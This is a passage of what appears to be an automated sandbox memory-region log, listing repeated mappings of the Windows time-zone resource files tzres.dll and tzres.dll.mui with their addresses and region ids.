end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3330
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3331
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3332
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3333
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3334
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3335
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3336
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3337
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3338
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3339
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3340
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3341
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3342
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3343
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3344
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3345
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3346
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3347
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3348
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3349
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3354
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3355
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3356
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3357
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3358
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3359
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3360
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3361
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3362
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3363
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3364
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3365
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3366
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3367
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3368
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3369
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3370
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3371
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3372
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3373
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3374
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3375
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3376
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3377
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3378
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3379
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3380
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3381
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3382
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3383
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3384
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3385
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3386
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3387
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3388
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3389
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3392
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3393
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3394
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3395
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3396
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3397
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3398
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3399
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3400
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3401
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3402
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3403
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3404
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3405
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3406
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3407
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3408
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3409
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3410
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3411
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3412
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3413
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3414
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3415
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3416
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3417
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3418
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3419
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3420
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3421
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3422
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3423
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3424
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3425
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3426
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3427
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3428
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3429
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3430
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3431
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3432
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3433
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3434
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3435
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3436
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3437
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3438
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3439
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3440
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3441
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3442
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3443
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3444
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3445
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3446
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3447
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3448
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3449
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3450
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
